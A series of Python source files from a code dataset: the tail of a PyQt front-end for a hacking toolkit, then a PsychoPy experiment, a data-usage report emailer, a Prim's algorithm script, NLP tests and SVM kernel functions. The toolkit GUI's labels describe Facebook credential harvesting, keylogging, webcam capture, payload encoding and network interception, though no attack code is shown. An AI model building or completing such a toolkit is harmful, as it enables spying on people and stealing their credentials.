you click on the Icons.\n\t\tself.labelConfig1.setText('URL')\n\t\tself.labelConfig2.setText('Find')\n\t\tself.labelConfig3.setText('Save')\n\t\tself.labelConfig4.setText('Route')\n\t\tself.groupBox.setTitle('SELECTED: script_amaterasu.py')\n\t\tself.buttonLOADSCRIPT.setEnabled(True)\n\tdef selectIZANAMI(self):\n\t\tself.labelConfig1.setText('FB Username')\n\t\tself.labelConfig2.setText('FB Password')\n\t\t# self.textScript2.setEchoMode(QtGui.QLineEdit.Password) NECESITA SER QlineEdit\n\t\tself.labelConfig3.setText('FB Target ID')\n\t\tself.labelConfig4.setText('Output file')\n\t\tself.groupBox.setTitle('SELECTED: script_izanami.py')\n\t\tself.buttonLOADSCRIPT.setEnabled(True)\n\tdef selectIZANAGI(self):\n\t\tself.labelConfig1.setText('FB ID')\n\t\tself.labelConfig2.setText('Data Proccesing(V/F)')\n\t\tself.labelConfig3.setText('Who React(V/F)')\n\t\tself.labelConfig4.setText('IMG Downloading(V/F)')\n\t\tself.groupBox.setTitle('SELECTED: script_izanagi.py')\n\t\tself.buttonLOADSCRIPT.setEnabled(True)\n\tdef selectKAMUI(self):\n\t\tself.labelConfig1.setText('EMAIL')\n\t\tself.labelConfig2.setText('KB to KILL')\n\t\tself.labelConfig3.setText('Capture Webcam (V/F)')\n\t\tself.labelConfig4.setText('Screenshot (V/F)')\n\t\tself.groupBox.setTitle('SELECTED: script_kamui.py')\n\t\tself.buttonLOADSCRIPT.setEnabled(False)\n\tdef selectKOTOAMATSUKAMI(self):\n\t\tself.labelConfig1.setText('File to Venom')\n\t\tself.labelConfig2.setText('False files (V/F)')\n\t\tself.labelConfig3.setText('Encoders (0,1)')\n\t\tself.labelConfig4.setText('To Rar (V/F)')\n\t\tself.groupBox.setTitle('SELECTED: script_kotoamatsukami.py')\n\t\tself.buttonLOADSCRIPT.setEnabled(False)\n\tdef selectSUSANOO(self):\n\t\tself.labelConfig1.setText('IP Target')\n\t\tself.labelConfig2.setText('IP Gateway')\n\t\tself.labelConfig3.setText('Interface')\n\t\tself.labelConfig4.setText('IP/Port Proxy')\n\t\tself.groupBox.setTitle('SELECTED: script_susanoo.py')\n\t\tself.buttonLOADSCRIPT.setEnabled(False)\n\tdef selectTSUKUYOMI(self):\n\t\tself.labelConfig1.setText('USER/PASS')\n\t\tself.labelConfig2.setText('FB MAIN ID')\n\t\tself.labelConfig3.setText('Tree Analisis(1,2,3)')\n\t\tself.labelConfig4.setText('Sleep Time (00:00)')\n\t\tself.groupBox.setTitle('SELECTED: script_tsukuyomi.py')\n\t\tself.buttonLOADSCRIPT.setEnabled(False)\n\nif __name__ == \"__main__\":\n\tapp = QtWidgets.QApplication([])\n\twindow = MainWindow()\n\twindow.show()\n\tapp.exec_()","sub_path":"SH4R1NG4N.py","file_name":"SH4R1NG4N.py","file_ext":"py","file_size_in_byte":16071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"572857094","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom psychopy import core, clock, visual, event, sound\nimport csv, random\nimport my # import functions in my.py from psychopy tutorial\nimport os\nimport pandas as pd\n# import seaborn\nimport matplotlib.pyplot as plt\n\n\n## Setup Section\nwin = visual.Window(size=[800,600], fullscr=False, monitor=\"testMonitor\", units='cm')\nnumblocks = 5 # this is the number of blocks a participant will complete\nnumrepeatedtrials = 4 # this is the number of times each sound file will be played per block\n\ndef displayStimulus(stimulusname, recordtime=None, waittime=None, secondstim=None, sound=None):\n '''Basic function for presenting stimuli.\n stimulusname = The name of the stimulus created in the setup section\n recordtime (optional) = The name of the time you are recording (e.g., time image is presented is imgTime)\n waittime (optional) = Time to hold stimulus (i.e., stimulusname) on screen\n sound (optional) = Sound to play after stimulus becomes visible'''\n stimulusname.draw()\n if secondstim:\n secondstim.draw()\n win.flip()\n if recordtime:\n times[recordtime] = clock.getTime()\n if sound:\n sound.play()\n if waittime:\n core.wait(waittime)\n\n# read stimulus file into list of dicts, then shuffle\ntrials = []\nstimlist = my.getStimulusInputFileDict('stimuli.csv')\nfor i in range(0, numrepeatedtrials): # this adds repeated trials for a given block\n trials += stimlist\nrandom.shuffle(trials)\n\n#create lists/stimuli for stimulus elements\noption1 = [visual.TextStim(win, text=trial['Option1'] + '\\n\\n<==' , pos=(-8.0,0)) for trial in trials]\noption2 = [visual.TextStim(win, text=trial['Option2'] + '\\n\\n==>', pos=(8.0,0)) for trial in trials]\nsoundfile = [sound.Sound(value=\"stimuli/{}\".format(trial['Filename'])) for trial in trials]\n\n#feedback\nno_response = visual.TextStim(win, \"You did not respond within 6 seconds. Press the left arrow or right arrow to respond after the sound has played.\")\n\n#fixation cross\nfixation = visual.ShapeStim(win, \n vertices=((0, -0.5), (0, 0.5), (0,0), (-0.5,0), (0.5, 0)),\n lineWidth=5,\n closeShape=False,\n lineColor='white'\n)\n\nwelcomestr = (\"Welcome! For this experiment, choose which sound you hear. \"\n \"Use the left arrow key for \\\"{}\\\" and the right arrow key for \\\"{}\\\".\\n\\n\"\n \"There will be {} blocks of items with a break in between each one. \"\n \"Press any other key to begin. \")\n\ninterblockstr = (\"You will now begin Block {}.\\n\\n\"\n \"Press any key to continue.\")\n\n# create dictionaries to collect data about percentages\nsoundvalues = {stimdict['Value']:[0,0] for stimdict in stimlist}\n#print(soundvalues)\n\n# open data output file\ndirectory = \"result_data\" # This is where all of the output data will go\nppn = my.getString(win, \"Please enter a participant number:\")\ndatafile = my.openDataFile(ppn)\n# connect it with a csv writer\nwriter = csv.writer(datafile, delimiter=\",\")\n# create output file header\nwriter.writerow([\n \"Trial Number\", \n \"Sound Value\",\n \"Selection\",\n \"Filename\"\n ])\n \n## Experiment Section\n# show welcome screen\nmy.getCharacter(win, welcomestr.format(trials[0]['Option1'], trials[0]['Option2'], numblocks))\nstartTime = clock.getTime() # clock is in seconds\n\nblocknum = 0\ntrialnum = 0\nkey = []\nrandomseed = 0\nwhile blocknum < numblocks:\n for i in range(len(trials)):\n trial = trials[i]\n times = {}\n \n # Cue: present fixation for 100 ms\n displayStimulus(fixation, 'fixationTime', 0.100)\n \n # Delay: blank screen for 100 ms\n win.flip()\n times['blankTime'] = clock.getTime()\n core.wait(0.100)\n \n # Stimulus/Response: present stimulus image and wait up to 6 seconds or for a response of y, n, or Esc key\n displayStimulus(option1[i], recordtime='stimTime', secondstim=option2[i], sound=soundfile[i])\n key = event.waitKeys(6.000, ['left', 'right', 'escape'])\n times['responseTime'] = clock.getTime()\n \n # Anti-Startle: blank screen for 50 ms\n win.flip()\n times['antistartleTime'] = clock.getTime()\n core.wait(0.050)\n \n # collect data\n soundvalues[trial['Value']][1] += 1\n selection = \"\"\n if key:\n if key[0] == \"left\":\n # record selection\n selection = trial['Option1']\n # add data to soundvalues dict\n soundvalues[trial['Value']][0] += 1\n elif key[0] == \"right\":\n selection = trial['Option2']\n else:\n selection = \"escape\"\n else:\n selection = \"no response\"\n displayStimulus(no_response, waittime=1.000) # Included 1 sec for this part so users could see the instructions briefly\n \n # Inter-trial Interval: blank screen for 1000 ms\n win.flip()\n times['intertrialTime'] = clock.getTime()\n core.wait(1.000)\n \n # write result to data file\n if key==None:\n key=[]\n key.append(\"no key\")\n \n #print(\"sound: {}, blocknum: {}, key pressed: {}={}\".format(trial['Filename'], blocknum, key[0], selection))\n \n writer.writerow([\n trialnum,\n trial['Value'],\n selection,\n trial['Filename']\n ])\n \n trialnum += 1\n if key[0]=='escape':\n break\n blocknum += 1\n if key[0]=='escape':\n break\n # randomize subsequent blocks\n randomseed = random.random()\n random.seed(randomseed)\n random.shuffle(trials)\n random.seed(randomseed)\n random.shuffle(soundfile)\n # intermission screen\n if blocknum < numblocks:\n my.getCharacter(win, interblockstr.format(blocknum + 1))\ndatafile.close()\n\n# FINAL PERCENTAGES\n# open data output file\npercentages = my.openDataFile(ppn + \"_summary\")\n# connect it with a csv writer\nwriter = csv.writer(percentages, delimiter=\",\")\n# create output file header\nwriter.writerow([\n \"Sound Value\",\n \"Number Labeled {}\".format(trials[0]['Option1']),\n \"Total Seen\",\n \"Percent Labeled {}\".format(trials[0]['Option1'])\n ])\n \nfor keyvalue in sorted(soundvalues.keys()):\n writer.writerow([\n keyvalue,\n soundvalues[keyvalue][0],\n soundvalues[keyvalue][1],\n float(soundvalues[keyvalue][0])/float(soundvalues[keyvalue][1]) * 100 if soundvalues[keyvalue][1] > 0 else 0\n ])\npercentages.close()\n\n# show goodbye screen\nmy.showText(win, \"Thank you for participating!\")\ncore.wait(2.000)\n\n## Closing Section\nwin.close()\n# create line graph\ninput = os.path.join(\"result_data\", \"ppn{}_summary_results.csv\".format(ppn))\noutput = os.path.join(\"result_data\", \"ppn{}_plot\".format(ppn))\ndf = pd.read_csv(input)\ngraph = df.plot(x=\"Sound Value\", y=\"Percent Labeled {}\".format(trials[0]['Option1']))\nfig = graph.get_figure()\nfig.savefig(output)\ncore.quit()","sub_path":"Identification Experiment/identification.py","file_name":"identification.py","file_ext":"py","file_size_in_byte":7029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"45269501","text":"#!/usr/bin/env python\n#---------------------------------------------------------------------------------------------------\n# Daily Report\n# Print: Total data owned\n# Percentage used storage\n# Data owned per site\n# Percentage used per site\n# Total data subscribed\n# Data subscribed per site\n#---------------------------------------------------------------------------------------------------\nimport sys, os, datetime, sqlite3, ConfigParser\nfrom operator import itemgetter\nfrom email.MIMEText import MIMEText\nfrom email.MIMEMultipart import MIMEMultipart\nfrom email.Utils import formataddr\nfrom subprocess import Popen, PIPE\nimport makeTable, sites\nimport dbApi, phedexData, popDbData\n\nclass dataDealerReport():\n def __init__(self):\n config = ConfigParser.RawConfigParser()\n config.read('/usr/local/IntelROCCS/DataDealer/intelroccs.cfg')\n self.rankingsCachePath = config.get('DataDealer', 'cache')\n self.reportPath = config.get('DataDealer', 'report_path')\n self.phedexData = phedexData.phedexData()\n self.popDbData = popDbData.popDbData()\n self.dbApi = dbApi.dbApi()\n self.sites = sites.sites()\n\n def _toStr(self, toList):\n names = [formataddr(i) for i in zip(*toList)]\n return ', '.join(names)\n\n def sendReport(self, title, text):\n # Send email\n fromEmail = (\"Bjorn Barrefors\", \"bjorn.peter.barrefors@cern.ch\")\n #toList = ([\"Bjorn Barrefors\"], [\"bjorn.peter.barrefors@cern.ch\"])\n toList = ([\"Bjorn Barrefors\"], [\"barrefors@gmail.com\"])\n #toList = ([\"Data Management Group\"], [\"hn-cms-dmDevelopment@cern.ch\"])\n #toList = ([\"Bjorn Barrefors\", \"Brian Bockelman\", \"Maxim Goncharov\", \"Christoph Paus\"],\n # [\"bjorn.peter.barrefors@cern.ch\", \"bbockelm@cse.unl.edu\", \"maxi@mit.edu\", \"paus@mit.edu\"])\n\n msg = MIMEMultipart()\n msg['Subject'] = title\n msg['From'] = formataddr(fromEmail)\n msg['To'] = self._toStr(toList)\n msg1 = MIMEMultipart(\"alternative\")\n msgText1 = MIMEText(\"%s \" % text, \"html\")\n msgText2 = MIMEText(text)\n msg1.attach(msgText2)\n msg1.attach(msgText1)\n msg.attach(msg1)\n msg = msg.as_string()\n p = Popen([\"/usr/sbin/sendmail\", \"-toi\"], stdin=PIPE)\n p.communicate(msg)\n\n def createReport(self):\n # Initialize\n date = datetime.date.today()\n cacheFile = \"%s/%s.db\" % (self.rankingsCachePath, \"rankingsCache\")\n rankingsCache = sqlite3.connect(cacheFile)\n\n # Get all sites with data usage, quota, and rank\n allSites = self.sites.getAllSites()\n blacklistedSites = self.sites.getBlacklistedSites()\n siteQuota = dict()\n for site in allSites:\n query = \"SELECT Quotas.SizeTb FROM Quotas INNER JOIN Sites ON Quotas.SiteId=Sites.SiteId INNER JOIN Groups ON Groups.GroupId=Quotas.GroupId WHERE Sites.SiteName=%s AND Groups.GroupName=%s\"\n values = [site, \"AnalysisOps\"]\n data = self.dbApi.dbQuery(query, values=values)\n quota= data[0][0]\n usedStorage = self.phedexData.getSiteStorage(site)\n with rankingsCache:\n cur = rankingsCache.cursor()\n cur.execute('SELECT Rank FROM Sites WHERE SiteName=?', (site,))\n row = cur.fetchone()\n if not row:\n rank = 0\n else:\n rank = row[0]\n siteQuota[site] = (quota, usedStorage, rank)\n\n # Get all subscriptions\n subscriptions = []\n query = \"SELECT Datasets.DatasetName, Sites.SiteName, Requests.Rank FROM Requests INNER JOIN Datasets ON Datasets.DatasetId=Requests.DatasetId INNER JOIN Sites ON Sites.SiteId=Requests.SiteId WHERE Requests.Date>%s AND Requests.RequestType=%s\"\n values = [date.strftime('%Y-%m-%d %H:%M:%S'), 0]\n data = self.dbApi.dbQuery(query, values=values)\n for sub in data:\n subscriptions.append([info for info in sub])\n subscriptions.sort(reverse=True, key=itemgetter(2))\n\n # Get top 10 datasets not subscribed\n cacheFile = \"%s/%s.db\" % (self.rankingsCachePath, \"rankingsCache\")\n nSubbed = len(subscriptions)\n topTen = []\n with rankingsCache:\n cur = rankingsCache.cursor()\n cur.execute('SELECT * FROM Datasets ORDER BY Rank DESC LIMIT ? OFFSET ?', (nSubbed+10, nSubbed))\n for row in cur:\n topTen.append(row)\n\n # Make title variables\n quota = 0.0\n dataOwned = 0.0\n for site, value in siteQuota.items():\n if not (site in blacklistedSites):\n quota += value[0]\n dataOwned += value[1]\n quotaUsed = int(100*(float(dataOwned)/float(quota*10**3)))\n dataSubscribed = 0.0\n siteSubscriptions = dict()\n for site in allSites:\n siteSubscriptions[site] = 0.0\n for subscription in subscriptions:\n subscriptionSize = self.phedexData.getDatasetSize(subscription[0])\n dataSubscribed += subscriptionSize\n site = subscription[1]\n siteSubscriptions[site] += subscriptionSize\n\n # Create title\n title = 'AnalysisOps %s | %d TB | %d%% | %.2f TB Subscribed' % (date.strftime('%Y-%m-%d'), int(dataOwned/10**3), int(quotaUsed), int(dataSubscribed/10**3))\n text = '%s\\n %s\\n%s\\n\\n' % ('='*68, title, '='*68)\n\n # Create site table\n # get status of sites\n siteTable = makeTable.Table(add_numbers=False)\n siteTable.setHeaders(['Site', 'Subscribed TB', 'Space Used TB', 'Space Used %', 'Quota TB', 'Rank', 'Status'])\n for site in allSites:\n subscribed = float(siteSubscriptions[site])/(10**3)\n quota = siteQuota[site][0]\n usedTb = int(siteQuota[site][1]/10**3)\n usedP = \"%d%%\" % (int(100*(float(usedTb)/float(quota))))\n status = \"up\"\n rank = float(siteQuota[site][2])\n if site in blacklistedSites:\n status = \"down\"\n siteTable.addRow([site, subscribed, usedTb, usedP, quota, rank, status])\n\n text += siteTable.plainText()\n\n # create subscription table\n text += \"\\n\\nNew Subscriptions\\n\\n\"\n\n subscriptionTable = makeTable.Table(add_numbers=False)\n subscriptionTable.setHeaders(['Rank', 'Size GB', 'Replicas', 'CPU Hours', 'Dataset'])\n for subscription in subscriptions:\n dataset = subscription[0]\n rank = float(subscription[2])\n size = self.phedexData.getDatasetSize(dataset)\n replicas = int(self.phedexData.getNumberReplicas(dataset))\n cpuH = int(self.popDbData.getDatasetCpus(dataset, (datetime.date.today() - datetime.timedelta(days=1)).strftime('%Y-%m-%d')))\n subscriptionTable.addRow([rank, size, replicas, cpuH, dataset])\n\n text += subscriptionTable.plainText()\n\n # create top ten datasets not subscribed table\n text += \"\\n\\nTop Ten Datasets Not Subscribed\\n\\n\"\n\n topTenTable = makeTable.Table(add_numbers=False)\n topTenTable.setHeaders(['Rank', 'Size GB', 'Replicas', 'CPU Hours', 'Dataset'])\n for dataset in topTen:\n datasetName = dataset[0]\n rank = float(dataset[1])\n size = self.phedexData.getDatasetSize(datasetName)\n replicas = int(self.phedexData.getNumberReplicas(datasetName))\n cpuH = int(self.popDbData.getDatasetCpus(datasetName, (datetime.date.today() - datetime.timedelta(days=1)).strftime('%Y-%m-%d')))\n topTenTable.addRow([rank, size, replicas, cpuH, datasetName])\n\n text += topTenTable.plainText()\n\n fs = open('%s/data_dealer-%s.report' % (self.reportPath, date.strftime('%Y%m%d')), 'w')\n fs.write(text)\n fs.close()\n\n text = \"http://t3serv001.mit.edu/~cmsprod/IntelROCCS/DataDealer/Logs/data_dealer-latest.log\\n\\nhttp://t3serv001.mit.edu/~cmsprod/IntelROCCS/DataDealer/Reports/data_dealer-latest.report\"\n\n self.sendReport(title, text)\n\nif __name__ == '__main__':\n dataDealerReport()\n sys.exit(0)\n","sub_path":"DataDealer/src/dataDealerReport.py","file_name":"dataDealerReport.py","file_ext":"py","file_size_in_byte":8189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"278884692","text":"import sys # Library for INT_MAX\n\nimport random\n\n\nfrom graph_reader import *\nfrom graph_adt_list import *\n\n# class Graph():\n#\n# def __init__(self, vertices):\n# self.V = vertices\n# self.graph = [[0 for column in range(vertices)]\n# for row in range(vertices)]\n#\n# # A utility function to print the constructed MST stored in parent[]\n# def printMST(self, parent):\n# print \"Edge \\tWeight\"\n# for i in range(1, self.V):\n# print parent[i], \"-\", i, \"\\t\", self.graph[i][ parent[i] ]\n#\n# # A utility function to find the vertex with\n# # minimum distance value, from the set of vertices\n# # not yet included in shortest path tree\n# def minKey(self, key, mstSet):\n#\n# # Initilaize min value\n# min = sys.maxint\n#\n# for v in range(self.V):\n# if key[v] < min and mstSet[v] == False:\n# min = key[v]\n# min_index = v\n#\n# return min_index\n\n # Function to construct and print MST for a graph\n # represented using adjacency matrix representation\n# def primMST(graph):\n#\n# visited = []\n# unvisited = []\n#\n# i = 1\n#\n# for v in graph.vertices:\n# unvisited.append(v) # appending the linkedlist object\n#\n# # choose a random index\n# index = random.randint(0, graph.numberOfVertices-i)\n#\n# # print(index)\n#\n# visited.append(unvisited.pop(index).id)\n#\n# while unvisited:\n#\n\n#\n# edges = graph.vertices[index].getEdges()\n#\n# lowest = float('inf')\n# lowest_vert = None\n#\n# if isinstance(edges, list): # if more than one edge..\n# for edge in edges:\n# if edge[1] not in visited:\n# temp = lowest\n# lowest = min(edge[2], lowest)\n# if temp != lowest:\n# lowest_vert = edge[1]\n# else: # if just one edge..\n# if edges[1] not in visited:\n# temp = lowest\n# lowest = min(edges[2], lowest)\n# if temp != lowest:\n# lowest_vert = edges[1]\n#\n# for i, v in enumerate(unvisited):\n# if v.id == lowest_vert:\n# visited.append(unvisited.pop(i).id)\n#\n# i+=1\n#\n# else:\n# return visited\n\ndef primMST(graph,edges):\n \"\"\"If it's a digraph all vertices must be represented\n in both to_vert and from_vert positions in:\n [to_vert, from_vert, weight]\n \"\"\"\n\n # choose a random index\n index = random.randint(0, graph.numberOfVertices-1)\n vertex = int(graph.vertices[index].id)\n\n MST = []\n visited = []\n minEdge = [None,None,float('inf')] # [to_vert, from_vert, weight]\n\n minEdge_index = 0\n\n # number of edges in a minimum spanning tree is graph.numberOfVertices-1\n while len(MST) < graph.numberOfVertices-1:\n\n visited.append(vertex) # append the new vertex to the visited array\n\n for i, edge in enumerate(edges):\n if edge[2] < minEdge[2] and edge[1] not in visited and edge[0] in visited and edge[0] != edge[1]:\n minEdge = edge\n minEdge_index = i\n\n edges.pop(minEdge_index)\n\n MST.append(minEdge)\n\n vertex = minEdge[1]\n minEdge = [None,None,float('inf')]\n\n return MST\n\n\nif __name__ == \"__main__\":\n\n filePath = \"graph_data.txt\"\n vertices, edges = readGraph(filePath)\n\n graph = LLGraph(vertices)\n graph.addEdges(edges)\n\n print(primMST(graph, edges))\n","sub_path":"MST_play/prims.py","file_name":"prims.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"255403243","text":"from nose.tools import assert_equal, assert_less, assert_true\nfrom unittest import skip, SkipTest\n\nfrom xtas.tasks import movie_review_polarity, stanford_ner_tag, tokenize\n\n\ndef test_movie_review_polarity():\n try:\n import sklearn\n except ImportError:\n raise SkipTest(\"movie review classifier requires scikit-learn\")\n\n # <.5 == probably not positive.\n assert_less(movie_review_polarity(\"This movie sucks.\"), .5)\n\n\ndef test_tokenize():\n tokens = tokenize(\"My hovercraft is full of eels.\")\n expected = \"My hovercraft is full of eels .\".split()\n for obs, exp in zip(tokens, expected):\n assert_equal(obs, {\"token\": exp})\n\n\ndef test_stanford_ner():\n # From Wikipedia front page, 10 Feb 2014.\n phrase = (\"Academy Award-winning actor Philip Seymour Hoffman\"\n \" dies at the age of 46.\")\n\n ne = stanford_ner_tag(phrase)\n for token, tag in ne:\n assert_true(isinstance(token, basestring))\n assert_true(tag in [\"O\", \"PERSON\"])\n\n names = stanford_ner_tag(phrase, format=\"names\")\n # Stanford doesn't pick up \"Academy Award\". This is not our fault.\n # (XXX divise a better test.)\n assert_equal(names, [(\"Philip Seymour Hoffman\", \"PERSON\")])\n","sub_path":"tests/test_single.py","file_name":"test_single.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"423207196","text":"\"\"\"\nCreated on Fri Dec 13 14:24:06 2019\n@author: Carlos Padierna\n\"\"\"\n#import numpy as np, matplotlib.pyplot as plt\nfrom numpy import zeros, array, exp, tanh, sqrt, power\nfrom sklearn.metrics.pairwise import check_pairwise_arrays, euclidean_distances\nfrom sklearn.utils.extmath import safe_sparse_dot\n#from numba import njit\n\"\"\"\nParameters\n ----------\n X : ndarray of shape (n_samples_1, n_features)\n Y : ndarray of shape (n_samples_2, n_features)\n\n degree : int, default 3\n gamma : float, default None\n if None, defaults to 1.0 / n_features\n\n coef0 : float, default 1\n\"\"\"\ndef build_K_Linear():\n def K_linear(X, Y=None): \n print('**K_linear**')\n X, Y = check_pairwise_arrays(X, Y) \n K = zeros((X.shape[0],Y.shape[0]))\n \n if X is Y: #fit-> La gramiana K es simétrica\n for i,x in enumerate(X):\n for j,z in enumerate(Y): \n K[i][j] = K[j][i] = x @ z\n if j > i:\n break\n else: #predict-> K NO es simétrica, es K\n return X @ Y.T\n #for i,x in enumerate(X):\n # for j,z in enumerate(Y): \n # K[i][j] = x@z\n \n return K\n return K_linear\n\ndef my_linear(X, Y=None, dense_output=True): \n print('**K_linear**')\n X, Y = check_pairwise_arrays(X, Y)\n #return X@Y.T\n return safe_sparse_dot(X, Y.T, dense_output=dense_output)\n\ndef build_K_sHerm(degree):\n def K_sHerm(X, Y=None): \n print('**K_sHerm, degree=: **',str(degree))\n X, Y = check_pairwise_arrays(X, Y) \n K = zeros((X.shape[0],Y.shape[0]))\n \n if X is Y: #fit-> La gramiana K es simétrica\n for l,x in enumerate(X):\n for m,z in enumerate(Y):\n summ, mult = 0, 1 \n for i in range(len(x)):\n summ = 1\n for k in range(1,degree + 1, 1):\n if x[i] !=0 and z[i] !=0:\n summ += H(x[i],k) * H(z[i],k) / (2**(2*degree))\n mult *= summ \n K[l][m] = K[m][l] = mult\n if m > l:\n break\n else: #predict-> K NO es simétrica, es K\n for l,x in enumerate(X):\n for m,z in enumerate(Y):\n summ, mult = 0, 1 \n for i in range(len(x)):\n summ = 1\n for k in range(1,degree + 1, 1):\n if x[i] !=0 and z[i] !=0:\n summ += H(x[i],k) * H(z[i],k) / (2**(2*degree))\n mult *= summ \n K[l][m] = mult\n \n return array(K)\n return K_sHerm\n\n# HERMITE POLYNOMIALS\n# *******************************************\ndef H(x_i,n): \n if(n == 0):\n return 1\n if(n == 1):\n return x_i\n return (x_i * H(x_i,n-1) - (n-1) * H(x_i, n-2))\n\ndef build_K_gegen(degree,a):\n def K_gegen(X, Y=None): \n print('**K_gegen, degree=: **',str(degree),' alpha= ',str(a))\n X, Y = check_pairwise_arrays(X, Y) \n K = zeros((X.shape[0],Y.shape[0]))\n \n if X is Y: #fit-> La gramiana K es simétrica\n for l,x in enumerate(X):\n for m,z in enumerate(Y):\n summ, mult = 0, 1 \n for i in range(len(x)):\n summ = 1\n for k in range(1,degree + 1, 1):\n if x[i] !=0 and z[i] !=0:\n summ += G(x[i],k,a) * G(z[i],k,a) * w(x[i], z[i],a,k)\n mult *= summ \n K[l][m] = K[m][l] = mult\n if m > l:\n break\n else: #predict-> K NO es simétrica, es K\n for l,x in enumerate(X):\n for m,z in enumerate(Y):\n summ, mult = 0, 1 \n for i in range(len(x)):\n summ = 1\n for k in range(1,degree + 1, 1):\n if x[i] !=0 and z[i] !=0:\n summ += G(x[i],k,a) * G(z[i],k,a) * w(x[i], z[i],a,k)\n mult *= summ \n K[l][m] = mult\n \n return array(K)\n return K_gegen\n\n# GEGENBAUER POLYNOMIALS\n# *******************************************\n# Ref: https://www.mathworks.com/help/symbolic/gegenbauerc.html#bueod6o-2\ndef G(x_i,n,a): \n if(a == -0.5): #######2020.03.09 REVISAR a==0 o a==-0.5\n return T(x_i,n)\n if(n == 0):\n return 1\n if(n == 1):\n return 2.0*a*x_i\n return (1.0 / (n+1.0)) * ( (2.0*(n+a))* x_i * G(x_i,n-1,a) - (n+2.0*a-1) * G(x_i,n-2,a) )\n \ndef w(x,y,a,n):\n if (a <= 0): #######2020.03.09 REVISAR a<=0 o a<=0.5\n return 1\n else:\n iNC = pochhamer(2*a+1,n) / pochhamer(1,n)\n iNC = 1E-10 if iNC == 0 else 1/(iNC**2)\n return iNC * ( power((1-x*x)*(1-y*y),a) + 0.1) / (n+1) #######2020.03.09 REVISAR a o a-0.5\n\ndef pochhamer(x,k):\n if k==0:\n return 1.0\n if k < 0:\n return 0.0\n if x == 0:\n return 0.0\n aux = 1.0\n for i in range(0,k):\n aux *= (x+i)\n return aux\n\ndef gegenbauerc(x, n, a):\n\n first_value = 1.0\n second_value = 2.0 * a * x\n\n if n == 0:\n return first_value\n elif n == 1:\n return second_value\n else:\n result = 0.0\n\n for i in range(2, n + 1):\n result = 2.0 * x * (i + a - 1.0) * second_value - (\n (i + 2.0 * a - 2.0) * first_value\n )\n result /= i\n\n first_value = second_value\n second_value = result\n return result\n\ndef build_K_cheb(degree):\n def K_cheb(X, Y=None): \n #print('**K_sHerm, degree=: **',str(degree))\n X, Y = check_pairwise_arrays(X, Y) \n K = zeros((X.shape[0],Y.shape[0]))\n \n if X is Y: #fit-> La gramiana K es simétrica\n for l,x in enumerate(X):\n for m,z in enumerate(Y):\n summ, mult = 0, 1 \n for i in range(len(x)):\n summ = 1\n for k in range(1,degree + 1, 1):\n if x[i] !=0 and z[i] !=0:\n summ += T(x[i],k) * T(z[i],k)\n mult *= summ / sqrt(1.0001-x[i]*z[i]) \n K[l][m] = K[m][l] = mult\n if m > l:\n break\n else: #predict-> K NO es simétrica, es K\n for l,x in enumerate(X):\n for m,z in enumerate(Y):\n summ, mult = 0, 1 \n for i in range(len(x)):\n summ = 1\n for k in range(1,degree + 1, 1):\n if x[i] !=0 and z[i] !=0:\n summ += T(x[i],k) * T(z[i],k)\n mult *= summ / sqrt(1.0001-x[i]*z[i]) \n K[l][m] = mult\n return array(K)\n return K_cheb\n\n# CHEBYSHEV POLYNOMIALS\n# *******************************************\ndef T(x_i,n): \n if(n == 0):\n return 1\n if(n == 1):\n return x_i\n return (2 * x_i * T(x_i,n-1) - T(x_i, n-2))\n\ndef build_K_rbf(gamma):\n def my_rbf(X, Y=None):\n \"\"\" K(x, y) = exp(-gamma ||x-y||^2)\n Returns kernel_matrix : array of shape (n_samples_X, n_samples_Y) \"\"\"\n X, Y = check_pairwise_arrays(X, Y)\n \n #if gamma is None:\n # gamma = 1.0 / X.shape[1]\n \n K = euclidean_distances(X, Y, squared=True)\n K *= -gamma\n exp(K, K) # exponentiate K in-place\n return K\n return my_rbf\n\n\ndef polynomial_kernel(X, Y=None, degree=3, gamma=None, coef0=1):\n \"\"\" K(X, Y) = (gamma + coef0)^degree \n Returns Gram matrix : array of shape (n_samples_1, n_samples_2) \"\"\"\n X, Y = check_pairwise_arrays(X, Y)\n if gamma is None:\n gamma = 1.0 / X.shape[1]\n\n K = safe_sparse_dot(X, Y.T, dense_output=True)\n K *= gamma\n K += coef0\n K **= degree\n return K\n\ndef sigmoid_kernel(X, Y=None, gamma=None, coef0=1):\n \"\"\" K(X, Y) = tanh(gamma + coef0)\n Returns Gram matrix : array of shape (n_samples_1, n_samples_2)\"\"\"\n X, Y = check_pairwise_arrays(X, Y)\n if gamma is None:\n gamma = 1.0 / X.shape[1]\n\n K = safe_sparse_dot(X, Y.T, dense_output=True)\n K *= gamma\n K += coef0\n tanh(K, K) # compute tanh in-place\n return K\n\n#def test_K_sHerm():\n #\"\"\"MUESTRA POLINOMIOS DE S-HERMITE PARA VALIDAR LA H(x_i,n) ESCALADA\"\"\"\n #plt.figure()\n #t = np.arange(-1,1.1,.1) #Rango de prueba\n #for i in range(1,6):\n #plt.plot(t, H(t,i)*2**(-i), label = 'Grado '+str(i))\n #plt.legend()\n #plt.title(\"Polinomios Ortogonales de s-Hermite\")","sub_path":"padaux/orthogonal_kernels.py","file_name":"orthogonal_kernels.py","file_ext":"py","file_size_in_byte":9189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
